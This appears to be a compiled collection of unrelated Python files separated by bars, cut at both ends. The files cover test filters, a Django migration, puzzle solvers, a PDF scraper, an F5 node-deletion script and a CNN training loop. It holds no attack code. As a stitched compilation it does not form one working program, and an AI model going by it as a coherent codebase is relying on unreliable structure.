        'SbPlayerWriteSampleTests/SbPlayerWriteSampleTest.WriteSingleBatch/audio_sintel_329_ec3_dmp_*',
        'SbPlayerWriteSampleTests/SbPlayerWriteSampleTest.WriteSingleBatch/audio_sintel_381_ac3_dmp_*',
        'SbPlayerWriteSampleTests/SbPlayerWriteSampleTest.WriteMultipleBatches/audio_sintel_329_ec3_dmp_*',
        'SbPlayerWriteSampleTests/SbPlayerWriteSampleTest.WriteMultipleBatches/audio_sintel_381_ac3_dmp_*',
        'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDayDestination/type_ipv6',
        'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceForDestination/type_ipv6',
        'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceNotLoopback/type_ipv6',
    ],
    'player_filter_tests': [test_filter.FILTER_ALL],
}
# Default (non-modular) filter set.
_FILTERED_TESTS = {
    'nplb': [
        # TODO(b/286249595): This test crashes when coverage is enabled.
        'SbMemoryMapTest.CanChangeMemoryProtection'
    ],
}
# Selected at import time from the environment of the test runner.
if os.getenv('MODULAR_BUILD', '0') == '1':
    _FILTERED_TESTS = _MODULAR_BUILD_FILTERED_TESTS
# Conditionally disables tests that require ipv6
if os.getenv('IPV6_AVAILABLE', '1') == '0':
    _FILTERED_TESTS['nplb'].extend([
        'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDayDestination/type_ipv6',
        'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceForDestination/type_ipv6',
        'SbSocketAddressTypes/SbSocketGetInterfaceAddressTest.SunnyDaySourceNotLoopback/type_ipv6',
        'SbSocketAddressTypes/SbSocketBindTest.RainyDayBadInterface/type_ipv6_filter_ipv6',
        'SbSocketAddressTypes/PairSbSocketGetLocalAddressTest.SunnyDayConnected/type_ipv6_type_ipv6',
        'SbSocketAddressTypes/PairSbSocketIsConnectedAndIdleTest.SunnyDay/type_ipv6_type_ipv6',
        'SbSocketAddressTypes/PairSbSocketIsConnectedTest.SunnyDay/type_ipv6_type_ipv6',
        'SbSocketAddressTypes/PairSbSocketReceiveFromTest.SunnyDay/type_ipv6_type_ipv6',
        'SbSocketAddressTypes/SbSocketResolveTest.Localhost/filter_ipv6_type_ipv6',
        'SbSocketAddressTypes/SbSocketResolveTest.SunnyDayFiltered/filter_ipv6_type_ipv6',
        'SbSocketAddressTypes/PairSbSocketSendToTest.RainyDaySendToClosedSocket/type_ipv6_type_ipv6',
        'SbSocketAddressTypes/PairSbSocketSendToTest.RainyDaySendToSocketUntilBlocking/type_ipv6_type_ipv6',
        'SbSocketAddressTypes/PairSbSocketSendToTest.RainyDaySendToSocketConnectionReset/type_ipv6_type_ipv6',
        'SbSocketAddressTypes/PairSbSocketWaiterWaitTest.SunnyDay/type_ipv6_type_ipv6',
        'SbSocketAddressTypes/PairSbSocketWaiterWaitTest.SunnyDayAlreadyReady/type_ipv6_type_ipv6',
        'SbSocketAddressTypes/PairSbSocketWaiterWaitTimedTest.SunnyDay/type_ipv6_type_ipv6',
        'SbSocketAddressTypes/PairSbSocketWrapperTest.SunnyDay/type_ipv6_type_ipv6',
    ])
# pylint: enable=line-too-long
# pylint: enable=line-too-long
class TestFilters(object):
  """Starboard Linux platform test filters."""

  _DRM_RELATED_TESTS = {
      'nplb': [
          'SbDrmTest.AnySupportedKeySystems',
          'SbMediaCanPlayMimeAndKeySystem.AnySupportedKeySystems',
      ],
  }

  def GetTestFilters(self):
    """Return this platform's filters, adding DRM filters when ce_cdm is absent."""
    filters = [
        test_filter.TestFilter(target, test)
        for target, tests in _FILTERED_TESTS.items()
        for test in tests
    ]
    cdm_header = os.path.join(paths.REPOSITORY_ROOT, 'third_party', 'internal',
                              'ce_cdm', 'cdm', 'include', 'cdm.h')
    if os.path.isfile(cdm_header):
      return filters
    # ce_cdm sources are not present: also filter the DRM-related tests.
    filters.extend(
        test_filter.TestFilter(target, test)
        for target, tests in self._DRM_RELATED_TESTS.items()
        for test in tests)
    return filters
def CreateTestFilters():
    # Factory entry point used by the Starboard test runner.
    return TestFilters()
|
class Cell:
    """Contains all information and methods regarding a single cell.

    The whole life of the cell is kept as `cell_history`: a list of
    [alive, generations_in_state] pairs, where the last entry describes
    the current state.
    """

    def __init__(self):
        """Start dead, with a single filler history entry."""
        self.cell_history = [[False, 0]]  # The total history of the cell

    def is_alive(self):
        """Return whether the cell is currently alive."""
        return self.cell_history[-1][0]

    def length_of_state(self):
        """Return how long the cell has been in its current state."""
        return self.cell_history[-1][1]

    def wipe_history(self):
        """Remove the filler history and the age of the states.

        NOTE(review): only a brand-new alive state ([True, 0]) survives the
        wipe; an aged alive state resets to dead -- confirm this is the
        intended behaviour of callers.
        """
        if self.cell_history[-1] == [True, 0]:
            self.cell_history = [[False, 0], [True, 0]]
        else:
            self.cell_history = [[False, 0]]

    def increment_history(self):
        """Add one generation to the current history without changing state."""
        self.update_history(False)

    def update_history(self, change):
        """Flip the cell's state (change=True) or age the current state by one."""
        if change:
            # Append the opposite state with a fresh age counter.
            self.cell_history.append([not self.is_alive(), 0])
        else:
            self.cell_history[-1][1] += 1

    def converted_data(self):
        """Return the cell as one character: '+'/'=' alive (old/new),
        '-'/'.' dead (old/new)."""
        # Idiom fix: direct boolean instead of `True if ... else False`,
        # and no redundant str.format around a single character.
        old = self.length_of_state() != 0
        if self.is_alive():
            return '+' if old else '='
        return '-' if old else '.'
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .mobilecommand import MobileCommand as Command
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.webelement import WebElement as SeleniumWebElement
class WebElement(SeleniumWebElement):
    """Appium extension of Selenium's WebElement adding mobile locator
    strategies (iOS UIAutomation, Android UIAutomator, accessibility id)
    and mobile-specific value/text commands."""

    def find_element_by_ios_uiautomation(self, uia_string):
        """Finds an element by uiautomation in iOS.
        :Args:
         - uia_string - The element name in the iOS UIAutomation library
        :Usage:
            driver.find_element_by_ios_uiautomation('.elements()[1].cells()[2]')
        """
        return self.find_element(by=By.IOS_UIAUTOMATION, value=uia_string)

    def find_elements_by_ios_uiautomation(self, uia_string):
        """Finds elements by uiautomation in iOS.
        :Args:
         - uia_string - The element name in the iOS UIAutomation library
        :Usage:
            driver.find_elements_by_ios_uiautomation('.elements()[1].cells()[2]')
        """
        return self.find_elements(by=By.IOS_UIAUTOMATION, value=uia_string)

    def find_element_by_android_uiautomator(self, uia_string):
        """Finds element by uiautomator in Android.
        :Args:
         - uia_string - The element name in the Android UIAutomator library
        :Usage:
            driver.find_element_by_android_uiautomator('.elements()[1].cells()[2]')
        """
        return self.find_element(by=By.ANDROID_UIAUTOMATOR, value=uia_string)

    def find_elements_by_android_uiautomator(self, uia_string):
        """Finds elements by uiautomator in Android.
        :Args:
         - uia_string - The element name in the Android UIAutomator library
        :Usage:
            driver.find_elements_by_android_uiautomator('.elements()[1].cells()[2]')
        """
        return self.find_elements(by=By.ANDROID_UIAUTOMATOR, value=uia_string)

    def find_element_by_accessibility_id(self, id):
        """Finds an element by accessibility id.
        :Args:
         - id - a string corresponding to a recursive element search using the
         Id/Name that the native Accessibility options utilize
        :Usage:
            driver.find_element_by_accessibility_id()
        """
        return self.find_element(by=By.ACCESSIBILITY_ID, value=id)

    def find_elements_by_accessibility_id(self, id):
        """Finds elements by accessibility id.
        :Args:
         - id - a string corresponding to a recursive element search using the
         Id/Name that the native Accessibility options utilize
        :Usage:
            driver.find_elements_by_accessibility_id()
        """
        return self.find_elements(by=By.ACCESSIBILITY_ID, value=id)

    def set_text(self, keys=''):
        """Sends text to the element. Previous text is removed.
        Android only.
        :Args:
         - keys - the text to be sent to the element.
        :Usage:
            element.set_text('some text')
        """
        # NOTE(review): uses self._id here but self.id in set_value below;
        # confirm which attribute the Selenium base class exposes.
        data = {
            'elementId': self._id,
            'value': [keys]
        }
        self._execute(Command.REPLACE_KEYS, data)
        # return self so calls can be chained
        return self

    @property
    def location_in_view(self):
        """Gets the location of an element relative to the view.
        :Usage:
            location = element.location_in_view
        """
        return self._execute(Command.LOCATION_IN_VIEW)['value']

    def set_value(self, value):
        """Set the value on this element in the application
        """
        data = {
            'elementId': self.id,
            'value': [value],
        }
        self._execute(Command.SET_IMMEDIATE_VALUE, data)
        # return self so calls can be chained
        return self
|
# Generated by Django 3.0.5 on 2020-04-22 00:28
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: drops the Organization*/Post* detail
    tables (contact details, identifiers, names, links) and the foreign
    keys pointing at them."""

    dependencies = [("data", "0001_initial")]

    operations = [
        # Remove the FKs first so the models can be deleted cleanly.
        migrations.RemoveField(
            model_name="organizationidentifier", name="organization"
        ),
        migrations.RemoveField(model_name="organizationname", name="organization"),
        migrations.RemoveField(model_name="postcontactdetail", name="post"),
        migrations.RemoveField(model_name="postlink", name="post"),
        migrations.DeleteModel(name="OrganizationContactDetail"),
        migrations.DeleteModel(name="OrganizationIdentifier"),
        migrations.DeleteModel(name="OrganizationName"),
        migrations.DeleteModel(name="PostContactDetail"),
        migrations.DeleteModel(name="PostLink"),
    ]
|
def giveParts(number):
    """Split a number into its leading and trailing two-digit parts.

    Returns (first_two_digits, number, digits_three_and_four); only
    meaningful for numbers with at least four digits.
    """
    digits = str(number)
    return (int(digits[:2]), number, int(digits[2:4]))
# Driver: searches for a closed cycle of six 4-digit figurate numbers — one
# triangle, square, pentagonal, hexagonal, heptagonal and octagonal — where
# the last two digits of each number equal the first two of the next
# (a Project Euler 61-style problem, presumably; verify against the source).
if __name__ == '__main__':
    triangle = []
    square = []
    pentagons = []
    hexagons = []
    heptagons = []
    octagons = []
    upper = 9999  # only 4-digit values are collected
    lower = 999
    n = 1
    # 'card' counts how many figurate families are still producing values
    # <= upper; faster-growing families are skipped once one overflows.
    card = 6
    halt = True
    while halt:
        n += 1
        tri = int(n*(n+1)/2)
        if tri > upper:
            halt = False
            break
        if tri > lower:
            triangle.append(tri)
        if card == 1:
            continue
        sqa = int(n**2)
        if sqa > upper:
            card = 1
            continue
        if sqa > lower:
            square.append(sqa)
        if card == 2:
            continue
        pent = int(n*(3*n-1)/2)
        if pent > upper:
            card = 2
            continue
        if pent > lower:
            pentagons.append(pent)
        if card == 3:
            continue
        hex = int(n*(2*n-1))  # NOTE(review): shadows the builtin hex()
        if hex > upper:
            card = 3
            continue
        if hex > lower:
            hexagons.append(hex)
        if card == 4:
            continue
        hept = int(n*(5*n-3)/2)
        if hept > upper:
            card = 4
            continue
        if hept > lower:
            heptagons.append(hept)
        if card == 5:
            continue
        oct = int(n*(3*n-2))  # NOTE(review): shadows the builtin oct()
        if oct > upper:
            card = 5
            continue
        if oct > lower:
            octagons.append(oct)
    # bigHolder[i] holds (first_two, value, last_two) triples per family;
    # triangle entries additionally carry the list of families left to visit.
    bigHolder = [[],[],[],[],[],[]]
    for t in triangle:
        bigHolder[0].append([[1,2,3,4,5], giveParts(t)])
    for s in square:
        bigHolder[1].append(giveParts(s))
    for p in pentagons:
        bigHolder[2].append(giveParts(p))
    for h in hexagons:
        bigHolder[3].append(giveParts(h))
    for h in heptagons:
        bigHolder[4].append(giveParts(h))
    for o in octagons:
        bigHolder[5].append(giveParts(o))
    chains = bigHolder[0].copy()
    # Extend every chain five times, once per remaining family, keeping only
    # extensions whose leading digits match the previous number's trailing digits.
    for k in range(5):
        holder = []
        for c in chains:
            last = c[len(c)-1][2]
            for left in c[0]:
                for a in bigHolder[left]:
                    if a[0] == last:
                        temp = c[0].copy()
                        temp.remove(left)
                        r = c.copy()
                        r.pop(0)
                        r = [temp] + r + [a]
                        holder.append(r)
        chains = holder.copy()
    # A valid answer wraps around: the first number's leading two digits
    # equal the last number's trailing two digits.
    for c in chains:
        c.pop(0)
        if c[0][0] == c[5][2]:
            this = c.copy()
            break
    summation = 0
    for c in this:
        summation += c[1]
    print(summation)
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
# Station catalogue: each entry maps a display name to its stream URL and an
# optional web-player "service" page ("NULL" when there is none).
radio = ({"radio": "Express FM", "stream": "http://stream4.nadaje.com:13324/express", "service": "NULL"},
         {"radio": "Bielsko FM", "stream": "http://stream4.nadaje.com:13322/radiobielsko", "service": "NULL"},
         {"radio": "Mega", "stream": "http://stream6.nadaje.com:8012/test", "service": "https://player.nadaje.com/services/3848/"},
         {"radio": "Disco", "stream": 'http://stream4.nadaje.com:8174/test', "service": "https://player.nadaje.com/services/4133/"},
         {"radio": "Nuta", "stream": "http://stream4.nadaje.com:8392/test", "service": "https://player.nadaje.com/services/4134/"},
         {"radio": "RMF MAXXX", "stream": "http://31.192.216.8:80/rmf_maxxx", "service": "NULL"},
         {"radio": "RMF FM", "stream": "http://31.192.216.8:80/rmf_fm", "service": "NULL"})

# Stream titles to skip — presumably station jingles / placeholder titles;
# verify against the consumer of this tuple.
title_pomijanie = ("Radio EXPRESS FM prawdziwa lokalna stacja",
                   "Radio BIELSKO przeboje non stop",
                   "no title found")
|
# -*- coding: utf-8 -*-
"""Tests using pytest_resilient_circuits"""
from __future__ import print_function
import os
import pytest
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from difflib import SequenceMatcher
# Package/function under test (resilient-circuits customization names).
PACKAGE_NAME = "fn_html2pdf"
FUNCTION_NAME = "fn_html2pdf"

# Read the default configuration-data section from the package
config_data = get_config_data(PACKAGE_NAME)

# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def call_utilities_html2pdf_function(circuits, function_params, timeout=10):
    """Fire fn_html2pdf with *function_params* and return its result value.

    Blocks until the function-result event arrives, up to *timeout* seconds.
    """
    submission = SubmitTestFunction("fn_html2pdf", function_params)
    circuits.manager.fire(submission)
    done = circuits.watcher.wait("fn_html2pdf_result", parent=submission, timeout=timeout)
    assert done
    result = done.kwargs["result"]
    assert isinstance(result, FunctionResult)
    pytest.wait_for(done, "complete", True)
    return result.value
class TestUtilitiesHtml2Pdf:
    """ Tests for the utilities_html2pdf function"""

    def test_function_definition(self):
        """ Test that the package provides customization_data that defines the function """
        func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
        assert func is not None

    # Live test: render nested-table HTML to PDF, with and without a custom
    # stylesheet, and compare against a stored base64 reference rendering.
    @pytest.mark.livetest
    @pytest.mark.parametrize("html2pdf_data, html2pdf_data_type, html2pdf_stylesheet, expected_results", [
        ("<table border=\"1\"><tr><th>key10</th><td><table border=\"1\"><tr><th>key20</th><td><table border=\"1\"><tr><th>a</th><td>a1</td></tr><tr><th>b</th><td>b1</td></tr><tr><th>key30</th><td><ul><li>1</li><li>2</li><li>3</li><li>4</li></ul></td></tr></table></td></tr></table></td></tr></table>",
         "string", None, "data/html2pdf/no_stylesheet.b64"),
        ("<table border=\"1\"><tr><th>key10</th><td><table border=\"1\"><tr><th>key20</th><td><table border=\"1\"><tr><th>a</th><td>a1</td></tr><tr><th>b</th><td>b1</td></tr><tr><th>key30</th><td><ul><li>1</li><li>2</li><li>3</li><li>4</li></ul></td></tr></table></td></tr></table></td></tr></table>",
         "string", "@page { size: landscape; }* { font-family: Arial; font-size: small; }table { border-collapse: collapse; }table, th, td { border: 1px solid red; }", "data/html2pdf/stylesheet.b64")
    ])
    def test_success(self, circuits_app, html2pdf_data, html2pdf_data_type, html2pdf_stylesheet, expected_results):
        """ Test calling with sample values for the parameters """
        function_params = {
            "html2pdf_data": html2pdf_data,
            "html2pdf_data_type": html2pdf_data_type,
            "html2pdf_stylesheet": html2pdf_stylesheet
        }
        results = call_utilities_html2pdf_function(circuits_app, function_params)
        # get the expected data
        res_path = os.path.join(os.path.dirname(__file__), expected_results)
        with open(res_path, 'r') as file:
            expected = file.read()
        print (results)
        # Fuzzy comparison on purpose:
        ratio = SequenceMatcher(a=expected, b=results.get('content')).ratio()
        assert ratio > 0.95  # weasyprint can render files slightly differently from run to run. thus must check for over 95% match

    def test_travis_pass(self):
        # ensure one test is run for travis to succeed
        return True
|
# Demonstrate the break statement: iteration stops at the first "g",
# so only the letters before it are printed.
for letter in "string":
    if letter == "g":
        break
    print(letter)
|
import re
from typing import Set, Tuple
TESTINPUT = """initial state: #..#.#..##......###...###
...## => #
..#.. => #
.#... => #
.#.#. => #
.#.## => #
.##.. => #
.#### => #
#.#.# => #
#.### => #
##.#. => #
##.## => #
###.. => #
###.# => #
####. => #"""
State = Set[int]
Rule = Tuple[bool, bool, bool, bool, bool]
Rules = Set[Rule]
def parse_raw(input: str) -> Tuple[State, Rules]:
    """Parse the raw puzzle text into (initial_state, growth_rules).

    The state is the set of pot indices holding a plant; the rules are the
    5-neighbourhood boolean patterns that produce a plant. Rules whose
    outcome is '.' are simply omitted.
    """
    lines = input.split('\n')
    # Header line: "initial state: #..#..." — plants become set indices.
    header = re.match("initial state: ([.#]*)", lines[0]).groups()[0]
    initial_state = {idx for idx, c in enumerate(header) if c == '#'}
    # Rule lines follow the blank separator: "..#.. => #".
    rules = set()
    for line in lines[2:]:
        pattern, outcome = re.match("([.#]{5}) => ([.#])", line).groups()
        if outcome == '#':
            rules.add(tuple(c == '#' for c in pattern))
    return initial_state, rules
def step(state: State, rules: Rules) -> State:
    """Advance the plant state by one generation.

    Only pots within 2 of an existing plant can change, so the scan is
    bounded by min(state)-2 .. max(state)+2.
    """
    result = set()
    for pot in range(min(state) - 2, max(state) + 3):
        neighbourhood = tuple(p in state for p in range(pot - 2, pot + 3))
        if neighbourhood in rules:
            result.add(pot)
    return result
def count_plants(state: State, rules: Rules, n_generations: int=20) -> int:
    """Run *n_generations* steps and return the sum of plant pot indices."""
    remaining = n_generations
    while remaining > 0:
        state = step(state, rules)
        remaining -= 1
    return sum(state)
if __name__ == "__main__":
    # Sanity-check against the worked example from the puzzle statement.
    state, rules = parse_raw(TESTINPUT)
    assert count_plants(state, rules) == 325
    with open('input.txt') as f:
        raw = f.read().strip()
    state, rules = parse_raw(raw)
    # print(count_plants(state, rules))
    # Part 2: the pattern eventually repeats as a shifted copy of itself, so
    # normalise each generation to its lowest pot index and watch for repeats.
    seen = {}  # Mapping from deltas => (generation, lowest)
    for gen in range(251):
        lowest = min(state)
        deltas = [plant - lowest for plant in state]
        key = tuple(sorted(deltas))
        print(gen, lowest, sum(state))
        if key in seen:
            print(key, seen[key])
        else:
            seen[key] = gen
        state = step(state, rules)
        gen += 1
    # Once stable, each generation adds a constant to the sum — extrapolate:
    # In [7]: 4447 + 15 * (50_000_000_000 - 250)
    # Out[7]: 750000000697
from tika import parser
from os.path import isfile, join
import glob
import re
# Collect the base names (extension stripped) of every PDF in the working
# directory, sorted; the first one is echoed as a quick sanity check.
files_no_ext = [".".join(f.split(".")[:-1]) for f in glob.glob("*.pdf") if isfile(f)]
files_no_ext.sort()
print(files_no_ext[0])
def scrap_file(t):
    """Extract metadata from ``<t>.pdf`` and append one CSV row to out.csv.

    Parses the document text with tika, then pulls out the subject line,
    plot number, municipality, village, addressee and decision date, and
    writes them as a single (comma/semicolon-mixed) CSV line.

    :param t: file name without the .pdf extension.
    """
    file_name = t + '.pdf'
    path = './' + file_name
    raw = parser.from_file(path)
    # NOTE(review): tika can return None for 'content' on unparsable PDFs;
    # the regexes below would then raise TypeError — confirm inputs are clean.
    text = raw['content']
    # Fix: all regex patterns are now raw strings; the originals relied on
    # Python passing unknown escapes like "\d" through, which is a
    # SyntaxWarning in modern Python and slated to become an error.
    # Subject: everything between "Относно:" and the salutation "УВАЖ".
    regex_ai = r'Относно: (.*)УВАЖ'
    match_ai = re.findall(regex_ai, text, flags=re.DOTALL)
    match_ai = ''.join(match_ai).replace('\n', '') if match_ai else ""
    # Plot number, e.g. "имот №123".
    match_a = re.search(r"имот №\d+", match_ai)
    match_a = match_a.group(0) if match_a else ""
    # Municipality name following "община"/"общ.".
    match_w = re.search(r"(община|общ\.) ([^,]+)", match_ai)
    match_w = match_w.group(2) if match_w else ""
    # Whether the plot lies in a village's land.
    match_x = re.search(r"землището на (с\.|село)", match_ai)
    match_x = "село" if match_x else ""
    # Village name.
    match_y = re.search(r"землището на (с\.|село) ([^,]+)", match_ai)
    match_y = match_y.group(2) if match_y else ""
    # Addressee: "ДО [г-н/г-жа/инж.] <first> [middle] <last>".
    match_aj = re.search(r"ДО.{0,5}(г-жа|г-н|инж\.)? (\w+) (\w+ )?(\w+)", text, re.IGNORECASE | re.DOTALL)
    match_aj = match_aj.group(2) + " " + match_aj.group(4) if match_aj else ""
    # Date near the "ДИРЕКТОР" signature, rewritten with '/' separators.
    regex_ay = r'ДИРЕКТОР.*(\d{2}\.\d{2}\.\d{2,4}).*\Z'
    match_ay = re.findall(regex_ay, text, flags=re.DOTALL)
    match_ay = ''.join(match_ay).replace('.', '/')
    match_ax = re.sub(r' ', '', t)
    print("data :" + str(match_ay))
    print("Otnosno: " + match_ai)
    print("imot nom:" + match_a)
    print("data :" + match_ay)
    line_out = match_a + ',' + match_w + ',' + match_x + ',' + match_y + ',"' + match_ai + '",' + match_aj + ',' + match_ax + ',' + match_ay + '\r\n'
    print(line_out)
    with open('out.csv', 'a') as f:
        f.write(line_out)  # Python 3.x
# Process every PDF found in the working directory.
for t in files_no_ext:
    scrap_file(t)
|
# region headers
# * author: salaheddine.gassim@nutanix.com
# * version: v1.0/10032020 - initial version
# task_name: F5DeleteNode
# description: Delete a single node
# input vars: node_name
# output vars: n/a
# endregion
# region capture Calm variables
# The @@{...}@@ macros are substituted by Calm at runtime.
# NOTE(review): the macros reference 'fortigate' although this task targets
# an F5 — confirm the endpoint/credential names in the blueprint.
api_server = "@@{fortigate_endpoint}@@"
f5_login = "@@{fortigate.username}@@"
f5_password = "@@{fortigate.secret}@@"
api_server_port = 80
node_name = "@@{platform.spec.name}@@"
# endregion
def f5_delete_node(api_server, api_server_port, node_name):
    """Delete a single LTM node from the F5 via its iControl REST API.

    Exits the whole script with status 1 when the API call fails.

    :param api_server: F5 management address.
    :param api_server_port: management port.
    :param node_name: name of the node to delete.

    NOTE(review): relies on the Calm script sandbox to supply ``urlreq`` and
    ``json``, and reads the module-level ``f5_login``/``f5_password``
    credentials rather than taking them as parameters.
    """
    # region prepare api call
    api_server_endpoint = "/mgmt/tm/ltm/node/" + node_name
    url = "http://{}:{}{}".format(
        api_server,
        api_server_port,
        api_server_endpoint
    )
    method = "DELETE"
    headers = {
        'Accept': '*/*'
    }
    # endregion
    # region make api call
    # make the API call and capture the results in the variable called "resp"
    print("Making a {} API call to {}".format(method, url))
    resp = urlreq(url, verb=method, user=f5_login, passwd=f5_password, headers=headers, verify=False)
    # deal with the result/response
    if resp.ok:
        print("Request was successful. Status code: {}".format(resp.status_code))
        result = json.loads(resp.content)
        print("node {} was deleted".format(result['name']))
    else:
        # Dump everything useful for debugging, then abort the task.
        print("Request failed")
        print("Headers: {}".format(headers))
        print('Status code: {}'.format(resp.status_code))
        print('Response: {}'.format(json.dumps(json.loads(resp.content), indent=4)))
        exit(1)
    # endregion
# Execute the deletion for the node named after this platform VM.
f5_delete_node(api_server, api_server_port, node_name)
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import math
from torch.utils.data import TensorDataset, DataLoader
import torch.utils.data as data
from torchvision import transforms
from torch.autograd import Variable
from torch.nn import functional as F
from torch import nn
import torch
from random import randint, sample
from PIL import Image
import numpy as np
import struct
import gzip
import os
# from tensorboardX import SummaryWriter
# Pin all CUDA work to device index 5 on this multi-GPU host.
torch.cuda.set_device(5)
class MoireCNN(nn.Module):
    """Multi-scale CNN for moire-artifact removal.

    Five branches process the input at scales 1, 1/2, 1/4, 1/8 and 1/16:
    each branch downsamples (s*1), refines with a constant-width conv stack
    (s*3), projects back to RGB while upsampling (s*2), and the five RGB
    outputs are summed to produce the final image.
    """

    def conv(self, channels):
        # Refinement stack: five 3x3 conv+ReLU layers at constant width.
        x=nn.Sequential(
            nn.Conv2d(channels, channels, 3, 1, 1),
            nn.ReLU(True),
            nn.Conv2d(channels, channels, 3, 1, 1),
            nn.ReLU(True),
            nn.Conv2d(channels, channels, 3, 1, 1),
            nn.ReLU(True),
            nn.Conv2d(channels, channels, 3, 1, 1),
            nn.ReLU(True),
            nn.Conv2d(channels, channels, 3, 1, 1),
            nn.ReLU(True)
        )
        return x

    def __init__(self):
        super().__init__()
        # Scale 1: RGB -> 32 features; s12 projects back to RGB.
        self.s11=nn.Sequential(
            nn.Conv2d(3, 32, 3, 1, 1),
            nn.ReLU(True),
            nn.Conv2d(32, 32, 3, 1, 1)
        )
        self.s12=nn.Conv2d(32, 3, 3, 1, 1)
        self.s13=self.conv(32)
        # Scale 1/2: stride-2 downsample to 64 channels; s22 upsamples x2 back.
        self.s21=nn.Sequential(
            nn.Conv2d(32, 32, 3, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(32, 64, 3, 1, 1)
        )
        self.s22=nn.Sequential(
            nn.ConvTranspose2d(64, 32, 4, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(32, 3, 3, 1, 1)
        )
        self.s23=self.conv(64)
        # Scale 1/4: one more stride-2 step; s32 upsamples x4 back to full size.
        self.s31=nn.Sequential(
            nn.Conv2d(64, 64, 3, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(64, 64, 3, 1, 1)
        )
        self.s32=nn.Sequential(
            nn.ConvTranspose2d(64, 64, 4, 2, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(64, 32, 4, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(32, 3, 3, 1, 1)
        )
        self.s33=self.conv(64)
        # Scale 1/8: s42 upsamples x8 back to full size.
        self.s41=nn.Sequential(
            nn.Conv2d(64, 64, 3, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(64, 64, 3, 1, 1)
        )
        self.s42=nn.Sequential(
            nn.ConvTranspose2d(64, 64, 4, 2, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(64, 32, 4, 2, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(32, 32, 4, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(32, 3, 3, 1, 1)
        )
        self.s43=self.conv(64)
        # Scale 1/16: s52 upsamples x16 back to full size.
        self.s51=nn.Sequential(
            nn.Conv2d(64, 64, 3, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(64, 64, 3, 1, 1)
        )
        self.s52=nn.Sequential(
            nn.ConvTranspose2d(64, 64, 4, 2, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(64, 32, 4, 2, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(32, 32, 4, 2, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(32, 32, 4, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(32, 3, 3, 1, 1)
        )
        self.s53=self.conv(64)

    def forward(self, x):
        # Build the feature pyramid (each x_{k+1} is half the size of x_k)...
        x1=self.s11(x)
        x2=self.s21(x1)
        x3=self.s31(x2)
        x4=self.s41(x3)
        x5=self.s51(x4)
        # ...refine each level, project back to full-resolution RGB...
        x1=self.s12(self.s13(x1))
        x2=self.s22(self.s23(x2))
        x3=self.s32(self.s33(x3))
        x4=self.s42(self.s43(x4))
        x5=self.s52(self.s53(x5))
        # ...and fuse the five scales by summation.
        x=x1+x2+x3+x4+x5
        return x
def train(epoch, lr):
    """Run one training epoch over ``train_loader``.

    Uses the module-level ``model``, ``train_loader``, ``criterion`` and
    ``use_gpu`` globals.

    :param epoch: epoch index (used only for logging).
    :param lr: learning rate for this epoch.
    """
    model.train()
    # Fix: build the optimizer once per epoch. The original re-created the
    # Adam optimizer inside the batch loop, which reset Adam's running
    # first/second-moment estimates on every batch and effectively disabled
    # its adaptive behaviour.
    optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=0.00001)
    for batch_idx, (data, target) in enumerate(train_loader):
        if use_gpu:
            data, target = data.cuda(non_blocking=True), target.cuda(non_blocking=True)
        # Legacy Variable wrapping (a no-op on modern PyTorch).
        data, target = Variable(data), Variable(target)
        optimizer.zero_grad()
        output = model(data)
        loss = criterion(output, target)
        loss.backward()
        optimizer.step()
        if batch_idx % 5000 == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
                epoch, batch_idx * len(data), len(train_loader.dataset),
                100. * batch_idx / len(train_loader), loss.data))
def test(epoch):
    """Evaluate on ``test_loader``; decay lr on regression, checkpoint on improvement.

    Updates the module-level ``pre_loss``, ``lr`` and ``best_loss`` globals.
    """
    model.eval()
    batches = 0
    total = 0.0
    for (data, target) in test_loader:
        if use_gpu:
            data, target = data.cuda(non_blocking=True), target.cuda(non_blocking=True)
        data, target = Variable(data), Variable(target)
        with torch.no_grad():
            output = model(data)
            loss = criterion(output, target)
        total += loss.data
        batches += 1
    total /= batches
    print('Test Epoch: {} \tLoss: {:.6f}'.format(
        epoch, total))
    global pre_loss, lr, best_loss
    if total > pre_loss:
        # Loss got worse vs. the previous epoch: decay the learning rate.
        lr *= 0.9
    if total < best_loss:
        # New best: checkpoint the full model.
        best_loss = total
        torch.save(model, "moire-1.pth")
    pre_loss = total
class MoirePic(data.Dataset):
    """Paired moire/clean image dataset yielding random 256x256 crops.

    :param rootX: directory of source (moire) images.
    :param rootY: directory of target (clean) images.
    :param training: when False, keep a random 10% subset (validation split).
    """

    def __init__(self, rootX, rootY, training=True):
